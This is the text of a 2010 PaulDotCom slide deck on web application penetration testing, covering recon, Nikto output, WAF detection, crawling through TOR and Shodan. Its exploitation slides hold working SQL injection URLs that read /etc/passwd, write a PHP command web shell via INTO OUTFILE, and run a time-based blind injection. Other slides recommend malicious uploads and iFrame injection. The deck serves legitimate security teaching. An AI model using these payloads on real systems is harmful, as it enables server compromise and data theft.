Web Application Penetration Testing Kung Fu
advertisement
Web Application Penetration Testing Kung Fu Tips, Tricks and Techniques for more effective web app testing John Strand, Paul Asadoorian http://pauldotcom.com Who are we? • I had this really boring slide about who we are • Then I realized that’s not who we really are • What follows is the “Powerpoint” version of who we are... http://pauldotcom.com January 2010 We Like To Hack Naked http://pauldotcom.com January 2010 We Drink Beer http://pauldotcom.com January 2010 We Enjoy Computer Destruction http://pauldotcom.com January 2010 We Do This Podcast Thing http://pauldotcom.com January 2010 The Crew John “Father John” Strand Paul “Salad Shooter” Asadoorian Larry “Dirty Uncle” Pesce Mick “Jr. Salad Shooter” Douglas ? Carlos “Dark0perator” Perez “Byte_Bucket” Mike “The Original Intern” Perez Darren “Girly Mustache” Wigley http://pauldotcom.com January 2010 Approach to Web Application Testing • The most important part of a test is understanding business logic • Looking for XSS, SQLi, RFI, etc. is important, but there is so much more • Web application testing is also heavily used attack vector - Because that is where the data is! • Once again, we need to think like an attacker http://pauldotcom.com January 2010 Lesson #1 • Recon is the most important step! • How can you test what you don’t know exists? • The right term is “spidering” • Manual and automated approaches are needed! http://pauldotcom.com January 2010 Enumeration • Manual - Browse web site through a proxy • Automated - Use Nessus or w3af • Ideally you have a tool that will do both, spider while you browse • Even Nikto can help find areas of the site that are not linked to in the application http://pauldotcom.com January 2010 Manually Investigate Findings From Automated Tools • XSS - Make it work! Add the proper code and characters to get it working, then come up with useful examples • Pop-up boxes are anti-climatic • Better to steal cookies and other information from the browser • Think about how the application works, then get creative! http://pauldotcom.com January 2010 The Most Important Thing • Surf the site! • Do not get hung up on tools, they only go so far • While automation is great because it greatly speeds up a test, it is merely a lenses through which to view your target application. • Authentication is very important, make sure you login successfully http://pauldotcom.com January 2010 • screen shot, show POST, cookies, etc.. http://pauldotcom.com January 2010 How many new targets can you find? + Server: Apache/1.3.41 (Unix) mod_perl/1.29 mod_ssl/2.8.31 OpenSSL/0.9.7e - /robots.txt - contains 1 'disallow' entry which should be manually viewed. (GET) + OSVDB-0: ETag header found on server, inode: 3278940, size: 70, mtime: 0x44bd5d50 + OpenSSL/0.9.7e appears to be outdated (current is at least 0.9.8i) (may depend on server version) + OSVDB-3233: GET /mailman/listinfo : Mailman was found on the server. + OSVDB-3268: GET /pdf/ : Directory indexing is enabled: /pdf + OSVDB-3092: GET /archive/ : This might be interesting... + OSVDB-3092: GET /beta/ : This might be interesting... + OSVDB-3092: GET /news : This may be interesting... + OSVDB-3092: GET /tools/ : This might be interesting... + OSVDB-3268: GET /images/ : Directory indexing is enabled: /images + OSVDB-3268: GET /static/ : Directory indexing is enabled: /static + OSVDB-3233: GET /icons/README : Apache default file found. http://pauldotcom.com January 2010 Recon: Waffit • Web application firewalls are becoming more prevalent • Not as much as they should be, but they are out there • Identifying the Web Application Firewall is an important step in assessing the target infrastructure and capabilities • We also get an understanding of the security teams awareness • Enter Waffit http://pauldotcom.com January 2010 Recon: Waffit (2) • Developed by Sandro Gauci and Wendel Henrique • Focus is identifying Web Application Firewalls • Needs help • This is an area where you can contribute back to a cool project • http://code.google.com/p/waffit/ http://pauldotcom.com January 2010 Example #1 http://pauldotcom.com January 2010 Example #2: What? http://pauldotcom.com January 2010 Sneaky Web Recon • Sometimes we are not testing tech • Sometimes we are testing people • Many current assessments have you give you IP Address to the client then they open their firewall up just for you - That is great However… • We should also test the security team to see how they react to a test • This may require you to get… creative http://pauldotcom.com January 2010 TOR Revisited • We have been playing with this for some time • Moxie Marlinspikes tools - www.thoughtcrime.org/ • Defcon presentation by Valsmith and friends • John’s Tech segment - http://pauldotcom.com/2009/08/scanning-through-a-tor-network.html • Mick added to the research - http://pauldotcom.com/wiki/index.php/ Episode182#Sneaky_web_crawling_.26_recon:_a_tech_segment_by_Mick http://pauldotcom.com January 2010 Can this suck? • You bet • TOR is slow, even under the best of circumstances • Nodes come and go • Some wont allow port scanning • Some are capturing everything you send through it • Not for the faint of heart http://pauldotcom.com January 2010 Mick’s Approach • Get TOR running • Then export your HTTP proxy • Start Crawling • export http_proxy=http://l27.0.0.1:8118 wget -r -t10 http://site.to.crawl.com/ -o crawl.log You may need –tX If your URL/URI includes special characters like "&" you need to escape it! - Slashies! \\\\ Wee! Slashies!! http://pauldotcom.com January 2010 http://pauldotcom.com January 2010 When is an attack not an attack? • When you don’t look for it • Problem… Only looking for known vulnerability types (i.e. XSS, SQLi, XSRF, etc) • If you can be replaced by a tool… You will be • We need to look for manual attack vectors • Just look at operating systems • Simple, consistent and widely deployed We still cant get it right Web applications are far more complex http://pauldotcom.com January 2010 Attack Approach #1 • Surf to the site! • Back to the crayons - Queue spiderman outfit • Start to draw a map of the site • Think through business logic • phpmyadmin http://pauldotcom.com January 2010 Approach #2 • Look for the ability to upload “stuff” • Then… Start uploading evil - Malware PHP files Pictures of Larry with a Wireless router • If you can upload entire files you are just a short hop away from owing the server - SharePoint? http://pauldotcom.com January 2010 iFrame Injection is Your Friend • Many tools miss this • If I can embed and iFrame in your server I can attack your users, even if your server is not attacking them • iFrames reference other sites on the net.. Like your evil BeEF server, Metasploit server that is hosting SET goodness • Attackers are doing this, why cant you? http://pauldotcom.com January 2010 Carryover Data #1 • Many tools look for vulnerabilities on a specific page - Simple Stimulus and Response • However, many sites do not work this way - Input data on page X then the data is displayed back on page Y, D, and C in different ways • Traditionally people look for Stored XSS • Takes time with the application • Customer Service Email Example http://pauldotcom.com January 2010 Carryover Data #2 • Will any of the data go someplace else? - XLS? - PDF? - Different database? - Different applications? • Sometimes the system you can attack is not right in front of you! • Ed’s Incident Paleontology - Attacks that keep on giving! http://pauldotcom.com January 2010 Shodan • Queue Barry White… Cant get enough • If you have something cool.. The guys at pentestit will come up with a list • • http://pentestit.com/shodan-queries/ Just a few - http://shodan.surtri.com/?q=Wordpress - http://shodan.surtri.com/?q=Joomla - http://shodan.surtri.com/?q=port:23+%22list+of+built-in+commands %22 Sometimes the best way to own a webserver is by owning the server first! http://pauldotcom.com January 2010 Feed the Troll • What you find needs to be given to the other members of your team • Social Engineering • Network Testing • Enter Cewl - www.digininja.org/projects/cewl.php • DigiNinja, PDC thinks You kick ass… http://pauldotcom.com January 2010 Exploitation • http://pauldotcom.com January 2010 SQL Injection - Protect your information CREATE USER 'readonly'@'localhost' IDENTIFIED BY 'readonly'; GRANT SELECT ON *.* TO 'readonly'@'localhost' WITH GRANT OPTION; CREATE USER 'readonly'@'%' IDENTIFIED BY 'readonly'; GRANT SELECT ON *.* TO 'readonly'@'%' WITH GRANT OPTION; http://pauldotcom.com January 2010 SQL Injection - w00t • http://192.168.1.26/Image_voting/index.php? show=-7%20union%20select %201,concat_ws(0x3a,load_file(%22/etc/ passwd%22)),3,4,5-• http://pauldotcom.com January 2010 SQL Injection - w00t * 2 • http://192.168.1.26/phpbms/modules/bms/ invoices_discount_ajax.php?id=-1%20UNION %20SELECT%20%22%3C? %20system($_REQUEST['cmd']);%20?%3E %22%20INTO%20OUTFILE%20%22/var/ data/mt-blogs/images/cmd.php%22%20 • http://pauldotcom.com January 2010 Blind SQL Injection • /Image_voting/index.php? comment_name=&id=6&vote=10&comment_ text=&show=3%20AND%20SLEEP(12)=0 • http://pauldotcom.com January 2010 SQL Injection • Do something useful with it! - Download all records from the database - Get a shell - Enumerate information • There are some great resources - http://www.greensql.net/publications/backdoor-webserver-usingmysql-sql-injection - http://ha.ckers.org/sqlinjection/ http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/ http://pauldotcom.com January 2010 /* End */ • Presentations: http://pauldotcom.com/ presentations.html • Radio: http://pauldotcom.com/radio • Live Stream: http://pauldotcom.com/live • Forum: http://forum.pauldotcom.com/ • Mailing List: http://mail.pauldotcom.com • Webcasts: http://pauldotcom.com/webcasts • Email: psw@pauldotcom.com *New* PaulDotCom Insider http://pauldotcom.ning.com/ http://pauldotcom.com January 2010
